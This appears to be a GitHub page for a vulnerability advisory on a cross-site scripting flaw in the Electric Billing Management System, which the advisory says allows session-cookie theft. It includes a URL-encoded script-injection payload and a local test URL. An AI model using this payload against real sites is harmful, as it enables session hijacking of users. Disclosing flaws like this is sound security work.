Skip to content

Latest commit

 

History

History

CVE-nu11-19-302021

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 


Description:

The Electric Billing Management System (by oretnom23) is suffering from XSS - DOM PHPSESSID hijacking vulnerability. The attacker can execute a remote payload and he can steal an active PHPSESSID, he can use for different malicious purpose.


  • Payload...
zd3ji%3c%2ftitle%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3eoyc33
  • Vulnerable app about
http://192.168.1.180/electric_billing/?page=about

Reproduce:

href

Proof:

href